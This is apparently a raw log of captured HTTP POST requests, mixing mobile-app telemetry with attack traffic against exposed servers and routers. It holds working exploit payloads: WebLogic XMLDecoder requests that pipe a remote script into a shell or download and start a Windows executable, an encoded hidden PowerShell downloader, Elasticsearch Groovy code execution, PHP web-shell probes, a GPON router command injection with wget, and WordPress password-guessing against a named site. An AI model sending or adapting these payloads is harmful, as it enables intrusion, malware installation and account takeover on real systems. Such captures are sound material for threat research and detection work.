{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL--


POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

435844
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

17e645353e4d8367cde87490f750d400
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://appinfocdn.ksmobile.net/cpui HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 58

:‘áå∆—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIetH_lq.°Î¡ÿn=ªgÌ∫NU]&

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

SqNYk4maYCxsDjnLiiWXJy+zzjldGfHrrWVT90FsngCw3LYKpKsYw9in9u1QJ9OROu0cFnaeVmHy4SZXMQ549PEbVEGritHlagLJ5iQINyy3+210fcm5VA/vnebZ3BI3eji4pl5wTBifyTl9tywxsj+Q82v1DiTIuwtomlw16xRHIvAVcFVj7U+tvVM8yqTPAWbFISGF8A3B6aDTzSv6R+Af+XV8lp30n5EbZ2M1iXul2itXXrX0rLtHJuKqnQs0mED6jpcwrfZHdSZStHgwSqYbrtqqMZwbot2kMdBZgIzPZxf0w3pdfXeck7YiMF4/bE2SgV4IJmxDh7IvesmrOlzNehKaNGSiQlwmnFHy4XdP5JMJI7+Qsg==

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

2c9
…fi_uÍ
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\YMZ+jO][Fu9Fj
V9!
2'KW$A

* D$"A@$JLZgYNHmxbT_THi~EZ[^ap|L[Z9~[5p3]LiyUS4+6
QHdWAPuqTiFV
Vi,^]oiVZ>{LUQR2kU+	L[IldWAPoy
aV^MZ-&WVA	8$S>@
s>9.
rQDTW@j~A@Ause_\PMm|C\URc~
hD
CBqAS3~Vg_V<}DYV\1(i@U\RMijYNHmkJ1[mz
SS4~3VYIkx^	e}
O|_D
CBddWAPf JDTC2%[
0 D2E?)AFu<
bDCBly@^ZXf|fPVUNdC@A	us
WeWVPJ<{EYT^f{NV2So.B
R_f~M|L[Z8B\U^b(N
hR_Mnp^
2}b\M5YAusrRDTTNnyFTVY{kX\rD
s.8&C<MCT=WVR^c#\_PMoqG]VZchQZY@qjNYH`~3@UXTA;)@
PS3+MVe[A9yF\Rue
BrDTAe-D_UZ4pPeESIk}FZYgzKT6TL% 


POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477785375459
X-Umeng-Sdk: Android/5.6.7 live.ly%2F3.3+GT-N8013%2F6.0.1+0C1D8E62E7F766B118C17CFA99A28899
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip

2b3
1.0575cfd16e0f55a5209001140@f6b495cc9d76e1b0ea07de2d87aa6cc9030ce7890bafd9a99c8b3fa9b53c0c58Ï”ÂÄû›xúïêMkA«á¥ij¨».è4H÷C÷y›yπ≈Rbµ®π	2Ÿô©ãõl…b∞=)¯rTÍ≈!û˚9<z~1±/zhPô”¿Û<ˇˇÔ◊é–Ï°6Äê"éd!¨†XcL«∞¿R}{˝˘Ÿ9àÚjò>}XîÖ≠ÏÓnZ_ÓEö"ÕR	+õUµS˙Ì“Ó	Wâ6úöô
eË∫Q‹Ù2√¥È	C7åX7òF…Ãubho⁄‚|Ü
%&«ÜK√î±\íÿyO¶ç¶’îu"h)Y»∞SDzîïdyÛ^˜ñ¬Ñ¡ZÔŒ÷Dv∂«UÓÎ∫w∆~“¡ùd"À+–Íç‹∏*4≥ߧ}∏úEjπ∫G¸	°–™Ì∞~<⁄âæº˙˙æÚá•≠€◊æ
'I®ùÅÜA£W°§53ìN’,¢v¸˝˘€˝}ts≠˘r±p¡¬eLµÃ	°›‹Ò–ÂÉ<t5ñ¨´¥tAk2`^«ÔfiÃ÷¢Z™˝∏∞%¨rÇe–x Ò@
wÒßG#Õ¬
ù¯õ´¯„Ò¸ä=D0•_µég¬nΩ‚öQÔ'/m~ä‡flπÔ√atÚo—f'ìπ'¡&Û`¸rò¸èC&ÛxB?
«b‹«@000095cc9d76e1b0ea07de2d87aa6cc9030ce7890bafd9a99c8b3fa9b53c0000 45073f5a0bdcd442978b484d89c842ea
0



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 37
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchueasd123

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 142

{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"help\").getText()"}}}

POST http://puds.ucweb.com/upgrade/index.xhtml?dataver=pb HTTP/1.1
Content-Length: 525
Host: puds.ucweb.com
Connection: Keep-Alive

_Œm90R™1håú«[ï°˛⁄0Q`⁄flGÈW7UxSÑ˘ˇ[Kw¨ÖŒIKD¬ù≤°˙¥◊IsR√Mü◊Jh9íaáéîäüªhhN/ÆOéÚfû‰¢ö(y~ãßÜ
îz—~—)CÙZ‰£,⁄·¸g‹y”.zx@≈ÁáBdaPÓ7JO¿;Ωv4oR檅\ä‰HBWó	\@uôù$…ZA‚¨flŸ§˝›G@û/∏1
íI€∫ÉY S˜]…uœ>ÚMò´çà*âÅœbLh¶sOV≈æ‹»Â†äõû≠7æú>’ùûDf√ õpŸ6Ûµ±‹ˆ`á°ùs
Tì≤'wı§B”u…ÆL—C)ï-{= ö&ôÒAJ
•˜;ôôΩéìt&o“>
±Ãsøá)Ë8ª»	‰äßñs¢_wıíπ$±AƒŒÉ˙
ñ:lW‹æ:ò['eø©æ˝+Æ}°∑Æ´ìÅÒ;|âÆh~,Å„¬ÜÀP_·ÀÈ2o¢ˆ∫∆˚>µ{π∂n-‚≥j!˘Ö@ao¢1ü®(˙º>˝ø]~ õ :¨ª¿HL2î(îvuπûß}˛ruá“os¶Ù™/„”˙◊€ŸéÎ\Ô™oÀÎ*¥fiß,ÓKdò¨ªµôUi'c3¬…¨Ï⁄y˝•‘sõ]∫ø√

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=123123

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

h=die('Hello, Peppa!');

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die((string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



POST http://check.best-proxies.ru/azenv.php?auth=146341031383456&a=PC&i=2733905975&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
¸√ßÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache

UVm6yHcUBZbg6tA61kGfR/oPD24GnyeYjXAjFwLwPDzhiJOrTEaiAV0FG/CkseabqHpQv0nm8jvEuMDIH65Jf4WO1W9YMOYVfrlZMcr9+ebAOqVUYfW8rDcMhbJS8EEEmGh5GIdzfqiYAtlw6aoL7xzY+7CMdiXrl0dp7QWjHfgyALncyoM8el+zKxh4DPBgJUHFpYlrnEoxLglYrOGo9hqzJdsRQgYZlLctKAuTXpjFfwfN5X1haQjWdybtl5e1LhqiJtAWkNQDaILxxE4Up51x+I50BY+BWSGGVtQnbKKKt3qMKWj2D8aNl76JrnjvAX565XWCNGJNp1BN9G7U7AwmZqLXR2nurcVharCrEz19LgCm6x0JTUO6I75sg7Qg/XdCenzc3hNIKu4=

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=letmein

POST http://behacdn.ksmobile.net/erfl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 49

1U˚as
ÍÕ`i'c
KlE^Sz]#[@^zZr^kZ&=0OoBcékJn‚O

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache

FKVWyI/BN6p6NsEoAO2Wcu75v77xN8FBz5t+l7nRGg7KeZLoZKutD+OmT7ctYKAmB3aGUWrc/5uJhnwYiQNL0Ow8NwhF+qvc1V3hnYK7JNiChwzoryGPfSk37AIaFJyHj8BiQtc2Zvz68A9H6o76CVlYR+Q01Vu1v75Dm0wd+zeRaA5oqSK60aKX0qyQ50zWuSjsnbC1uumVvP7Qolwxg1a1+3RdBGYNL4qaMZNvClmLmlGM8Tll+IYiu6cZGyLo8yfMX1olj6Rp8DV/LidsYQOnW5h5NKFBgXnn+X0uITv8HCe56daolennqYPQm902c4LyDccVaK83MfMklDdDEluo2iho1YBsetlP5BTomGuMsjjUzOA7qH3sYvfxOLawKKOeSkXepZk=

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495194021822&chk=d8c0a2f4 HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream

1ee
ã•’ΩnA‡ûßÿŸ{∆iK
$ËËsÁó nƒ
ëx{h)6Ìv;≈ß3«fiΔ˛˝˘ÚÙ∞3RT ⁄à3i∆∏Ω≈Ñx˘y?ÓÓÀÌ~/”íko°JIÁÂ˙¯ÂÓkfl”LU+D™dtÉ‚mB,⁄…,ŸÏrπ˝∫››˙∑ù¸Úÿ«uˇÙaìèüflˇ˝<vy∑û7◊ˇy$#f∆√ûñ⁄c:ÙQƒ-Å'(¡´ÙZ9Ìëç)ãe=ûè∏∂*›°çh ΩupWñ9ÿꀥ˙ä|˛y–{jmΠᯥus•VÌ›ÃEO{x# Î9Ïqâ•≠T¢6\(ü`ö∞k≥5?Ì—çVy^î{‡ ’@#&ê ∫d÷aLneT\Â>Ô·ç1…z‹3)å¡â`ÙW˛‹W

/¶⁄Y˚+ÚY˝—ò%ˆåH¶qÕ{è1¨˛T∑`–“¿πO:Ìâ•Œó6ó&Åóßvä∏ˆœ,P◊ÿQâ•P:üO˙”’ëԴ%l∆R Iê8,√⁄álR5%YÁO{|£êÉe°Ïü6'‚⁄œâhÕWQ(mò/\¬k<´Ã)=Ï1.»•F®}ïH,∫Yd17B=˙ø¯
dž'u¿
0



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache

RPRewt7JbU0i1uilF2EolNc/9QgGFxclyGJaoyw2/RZqzdPe2hQTbz6P4ZCFHziOPO9tcOHr+BoPT6QrflPvmMOEBkgtORgvo02juh8GGs0CGNgQ4t308VDNnim7d05VRHKYRJFcBUpi894bDt3gkZ5U+k3swdFUAepKt9+mGHk7VT2u3u1A/vS4RBA2oR7kuXvPJ+dsDbiORJYdCHqNFlyMvA8jo8CIRM+1CJiW/uFrkMfIXWorHGaoF1Cj4onDfS3DztW5jnj0bo3fL5yobfUUA7bbEmDICQ2L0DLIXwcTkH8GuUMjCSWJm2EIpEHFX5euRzNAfy/ZMHXvBynohBHo8nBndEtsoQ6rSviZmIgTaAFF5NuW4uV7mV62YvqXIYX+LORB20Ga/05SEtLpVHHgLx5qSw==

POST http://check.proxyradar.com/azenv.php?auth=149405774885&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
